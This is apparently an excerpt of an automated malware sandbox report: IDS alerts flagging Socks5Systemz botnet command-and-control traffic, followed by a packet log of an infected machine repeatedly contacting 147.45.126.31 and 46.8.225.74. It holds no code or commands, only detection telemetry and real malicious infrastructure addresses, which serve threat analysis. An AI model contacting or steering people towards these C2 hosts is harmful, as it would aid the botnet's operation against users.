                                                        2024-12-16T14:53:06.672139+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449750147.45.126.3180TCP
                                                        2024-12-16T14:53:08.409471+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449755147.45.126.3180TCP
                                                        2024-12-16T14:53:08.409471+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449755147.45.126.3180TCP
                                                        2024-12-16T14:53:10.043993+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449757147.45.126.3180TCP
                                                        2024-12-16T14:53:10.043993+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449757147.45.126.3180TCP
                                                        2024-12-16T14:53:10.695596+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449757147.45.126.3180TCP
                                                        2024-12-16T14:53:10.695596+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449757147.45.126.3180TCP
                                                        2024-12-16T14:53:12.337893+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449765147.45.126.3180TCP
                                                        2024-12-16T14:53:12.337893+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449765147.45.126.3180TCP
                                                        2024-12-16T14:53:13.939702+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449768147.45.126.3180TCP
                                                        2024-12-16T14:53:13.939702+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449768147.45.126.3180TCP
                                                        2024-12-16T14:53:15.552173+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449774147.45.126.3180TCP
                                                        2024-12-16T14:53:15.552173+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449774147.45.126.3180TCP
                                                        2024-12-16T14:53:17.135660+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449778147.45.126.3180TCP
                                                        2024-12-16T14:53:17.135660+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449778147.45.126.3180TCP
                                                        2024-12-16T14:53:18.859616+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449781147.45.126.3180TCP
                                                        2024-12-16T14:53:18.859616+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449781147.45.126.3180TCP
                                                        2024-12-16T14:53:19.478454+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449781147.45.126.3180TCP
                                                        2024-12-16T14:53:19.478454+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449781147.45.126.3180TCP
                                                        2024-12-16T14:53:21.246296+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449789147.45.126.3180TCP
                                                        2024-12-16T14:53:21.246296+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449789147.45.126.3180TCP
                                                        2024-12-16T14:53:21.856324+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449789147.45.126.3180TCP
                                                        2024-12-16T14:53:21.856324+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449789147.45.126.3180TCP
                                                        2024-12-16T14:53:22.496373+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449789147.45.126.3180TCP
                                                        2024-12-16T14:53:22.496373+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449789147.45.126.3180TCP
                                                        2024-12-16T14:53:23.106741+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449789147.45.126.3180TCP
                                                        2024-12-16T14:53:23.106741+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449789147.45.126.3180TCP
                                                        2024-12-16T14:53:25.816329+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449798147.45.126.3180TCP
                                                        2024-12-16T14:53:25.816329+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449798147.45.126.3180TCP
                                                        2024-12-16T14:53:27.716440+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449803147.45.126.3180TCP
                                                        2024-12-16T14:53:27.716440+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449803147.45.126.3180TCP
                                                        2024-12-16T14:53:28.327002+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449803147.45.126.3180TCP
                                                        2024-12-16T14:53:28.327002+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449803147.45.126.3180TCP
                                                        2024-12-16T14:53:29.959132+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449811147.45.126.3180TCP
                                                        2024-12-16T14:53:29.959132+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449811147.45.126.3180TCP
                                                        2024-12-16T14:53:31.620468+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449815147.45.126.3180TCP
                                                        2024-12-16T14:53:31.620468+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449815147.45.126.3180TCP
                                                        2024-12-16T14:53:33.371099+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449821147.45.126.3180TCP
                                                        2024-12-16T14:53:33.371099+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449821147.45.126.3180TCP
                                                        2024-12-16T14:53:34.117261+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449821147.45.126.3180TCP
                                                        2024-12-16T14:53:34.117261+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449821147.45.126.3180TCP
                                                        2024-12-16T14:53:35.744506+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449827147.45.126.3180TCP
                                                        2024-12-16T14:53:35.744506+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449827147.45.126.3180TCP
                                                        2024-12-16T14:53:37.333697+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449833147.45.126.3180TCP
                                                        2024-12-16T14:53:37.333697+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449833147.45.126.3180TCP
                                                        2024-12-16T14:53:38.973303+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449837147.45.126.3180TCP
                                                        2024-12-16T14:53:38.973303+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449837147.45.126.3180TCP
                                                        2024-12-16T14:53:40.596098+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449840147.45.126.3180TCP
                                                        2024-12-16T14:53:40.596098+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449840147.45.126.3180TCP
                                                        2024-12-16T14:53:42.202730+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449846147.45.126.3180TCP
                                                        2024-12-16T14:53:42.202730+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449846147.45.126.3180TCP
                                                        2024-12-16T14:53:42.800414+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449846147.45.126.3180TCP
                                                        2024-12-16T14:53:42.800414+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449846147.45.126.3180TCP
                                                        2024-12-16T14:53:44.551366+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449852147.45.126.3180TCP
                                                        2024-12-16T14:53:44.551366+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449852147.45.126.3180TCP
                                                        2024-12-16T14:53:46.194494+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449858147.45.126.3180TCP
                                                        2024-12-16T14:53:46.194494+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449858147.45.126.3180TCP
                                                        2024-12-16T14:53:47.807861+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449861147.45.126.3180TCP
                                                        2024-12-16T14:53:47.807861+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449861147.45.126.3180TCP
                                                        2024-12-16T14:53:49.453296+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449865147.45.126.3180TCP
                                                        2024-12-16T14:53:49.453296+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449865147.45.126.3180TCP
                                                        2024-12-16T14:53:50.052934+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449865147.45.126.3180TCP
                                                        2024-12-16T14:53:50.052934+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449865147.45.126.3180TCP
                                                        2024-12-16T14:53:51.727399+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449870147.45.126.3180TCP
                                                        2024-12-16T14:53:51.727399+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449870147.45.126.3180TCP
                                                        2024-12-16T14:53:53.322584+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449876147.45.126.3180TCP
                                                        2024-12-16T14:53:53.322584+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449876147.45.126.3180TCP
                                                        2024-12-16T14:53:54.934871+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449881147.45.126.3180TCP
                                                        2024-12-16T14:53:54.934871+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449881147.45.126.3180TCP
                                                        2024-12-16T14:53:55.522260+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449881147.45.126.3180TCP
                                                        2024-12-16T14:53:55.522260+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449881147.45.126.3180TCP
                                                        2024-12-16T14:53:57.108278+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449887147.45.126.3180TCP
                                                        2024-12-16T14:53:57.108278+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449887147.45.126.3180TCP
                                                        2024-12-16T14:53:57.707007+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449887147.45.126.3180TCP
                                                        2024-12-16T14:53:57.707007+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449887147.45.126.3180TCP
                                                        2024-12-16T14:53:59.334096+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449894147.45.126.3180TCP
                                                        2024-12-16T14:53:59.334096+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449894147.45.126.3180TCP
                                                        2024-12-16T14:54:00.963510+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449897147.45.126.3180TCP
                                                        2024-12-16T14:54:00.963510+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449897147.45.126.3180TCP
                                                        2024-12-16T14:54:02.553198+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449901147.45.126.3180TCP
                                                        2024-12-16T14:54:02.553198+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449901147.45.126.3180TCP
                                                        2024-12-16T14:54:04.619418+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449907147.45.126.3180TCP
                                                        2024-12-16T14:54:04.619418+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449907147.45.126.3180TCP
                                                        2024-12-16T14:54:06.313221+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449913147.45.126.3180TCP
                                                        2024-12-16T14:54:06.313221+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449913147.45.126.3180TCP
                                                        2024-12-16T14:54:07.978534+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449917147.45.126.3180TCP
                                                        2024-12-16T14:54:07.978534+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449917147.45.126.3180TCP
                                                        2024-12-16T14:54:10.024480+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449922147.45.126.3180TCP
                                                        2024-12-16T14:54:10.024480+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449922147.45.126.3180TCP
                                                        2024-12-16T14:54:11.689372+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449926147.45.126.3180TCP
                                                        2024-12-16T14:54:11.689372+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449926147.45.126.3180TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 16, 2024 14:52:59.425975084 CET4973780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:52:59.545905113 CET8049737147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:52:59.546046019 CET4973780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:52:59.546335936 CET4973780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:52:59.666263103 CET8049737147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:00.969518900 CET8049737147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:00.972079992 CET4973780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:00.974193096 CET497382023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:01.094541073 CET20234973846.8.225.74192.168.2.4
                                                        Dec 16, 2024 14:53:01.094631910 CET497382023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:01.094748020 CET497382023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:01.214397907 CET20234973846.8.225.74192.168.2.4
                                                        Dec 16, 2024 14:53:01.214498043 CET497382023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:01.334734917 CET20234973846.8.225.74192.168.2.4
                                                        Dec 16, 2024 14:53:02.415723085 CET20234973846.8.225.74192.168.2.4
                                                        Dec 16, 2024 14:53:02.464653015 CET497382023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:04.420773029 CET4973780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:04.541059017 CET8049737147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:04.945204020 CET8049737147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:04.945391893 CET4973780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:05.061263084 CET4973780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:05.061661959 CET4975080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:05.181736946 CET8049750147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:05.181934118 CET4975080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:05.182233095 CET4975080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:05.182300091 CET8049737147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:05.186594009 CET4973780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:05.302186966 CET8049750147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:06.672065020 CET8049750147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:06.672138929 CET4975080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:06.672974110 CET497542023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:06.792834997 CET20234975446.8.225.74192.168.2.4
                                                        Dec 16, 2024 14:53:06.792947054 CET497542023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:06.793062925 CET497542023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:06.793112040 CET497542023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:06.904274940 CET4975080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:06.904604912 CET4975580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:06.915045977 CET20234975446.8.225.74192.168.2.4
                                                        Dec 16, 2024 14:53:06.954684019 CET20234975446.8.225.74192.168.2.4
                                                        Dec 16, 2024 14:53:07.026329041 CET8049755147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:07.026344061 CET8049750147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:07.026468039 CET4975080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:07.026485920 CET4975580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:07.026691914 CET4975580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:07.146593094 CET8049755147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:07.791515112 CET20234975446.8.225.74192.168.2.4
                                                        Dec 16, 2024 14:53:07.791610956 CET497542023192.168.2.446.8.225.74
                                                        Dec 16, 2024 14:53:08.409395933 CET8049755147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:08.409471035 CET4975580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:08.529375076 CET4975580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:08.529706001 CET4975780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:08.649480104 CET8049755147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:08.649549961 CET8049757147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:08.649616003 CET4975580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:08.649651051 CET4975780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:08.649835110 CET4975780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:08.769591093 CET8049757147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:10.043884039 CET8049757147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:10.043992996 CET4975780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:10.154171944 CET4975780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:10.274163008 CET8049757147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:10.695456982 CET8049757147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:10.695595980 CET4975780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:10.810431957 CET4975780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:10.810723066 CET4976580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:10.930577993 CET8049765147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:10.930685997 CET4976580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:10.930886030 CET4976580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:10.935019970 CET8049757147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:10.935084105 CET4975780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:11.051282883 CET8049765147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:12.337655067 CET8049765147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:12.337893009 CET4976580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:12.451404095 CET4976580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:12.451869965 CET4976880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:12.571927071 CET8049765147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:12.571976900 CET8049768147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:12.572056055 CET4976580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:12.572177887 CET4976880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:12.572458029 CET4976880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:12.692255974 CET8049768147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:13.939490080 CET8049768147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:13.939702034 CET4976880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:14.060544014 CET4976880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:14.060899019 CET4977480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:14.180635929 CET8049774147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:14.180712938 CET8049768147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:14.180855036 CET4977480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:14.180866957 CET4976880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:14.181159019 CET4977480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:14.301379919 CET8049774147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:15.551892996 CET8049774147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:15.552172899 CET4977480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:15.670087099 CET4977480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:15.670456886 CET4977880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:15.790430069 CET8049778147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:15.790460110 CET8049774147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:15.790625095 CET4977880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:15.790852070 CET4977480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:15.790868044 CET4977880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:15.911140919 CET8049778147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:17.135580063 CET8049778147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:17.135659933 CET4977880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:17.343549967 CET4977880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:17.343851089 CET4978180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:17.463645935 CET8049781147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:17.463670015 CET8049778147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:17.463759899 CET4978180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:17.463804007 CET4977880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:17.468280077 CET4978180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:17.587964058 CET8049781147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:18.859541893 CET8049781147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:18.859616041 CET4978180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:18.966852903 CET4978180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:19.130718946 CET8049781147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:19.478001118 CET8049781147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:19.478454113 CET4978180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:19.591614008 CET4978180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:19.591869116 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:19.711807013 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:19.712193966 CET8049781147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:19.712300062 CET4978180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:19.712313890 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:19.712526083 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:19.832251072 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:21.246119022 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:21.246295929 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:21.357280970 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:21.477319002 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:21.856231928 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:21.856323957 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:21.966519117 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:22.086354017 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:22.496283054 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:22.496372938 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:22.614489079 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:22.734576941 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:23.106645107 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:23.106740952 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:23.325994968 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:23.326303959 CET4979880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:23.446274042 CET8049798147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:23.446384907 CET4979880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:23.446518898 CET8049789147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:23.446602106 CET4978980192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:23.446971893 CET4979880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:23.566950083 CET8049798147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:25.812499046 CET8049798147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:25.816329002 CET4979880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:26.201461077 CET4979880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:26.201905966 CET4980380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:26.322099924 CET8049803147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:26.322197914 CET4980380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:26.322357893 CET8049798147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:26.322401047 CET4980380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:26.322432041 CET4979880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:26.442481041 CET8049803147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:27.712352991 CET8049803147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:27.716439962 CET4980380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:27.826060057 CET4980380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:27.946007967 CET8049803147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:28.326920033 CET8049803147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:28.327002048 CET4980380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:28.486325026 CET4980380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:28.486829042 CET4981180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:28.607007027 CET8049803147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:28.607120037 CET4980380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:28.607626915 CET8049811147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:28.607708931 CET4981180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:28.688622952 CET4981180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:28.808499098 CET8049811147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:29.959032059 CET8049811147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:29.959131956 CET4981180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:30.077213049 CET4981180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:30.077691078 CET4981580192.168.2.4147.45.126.31
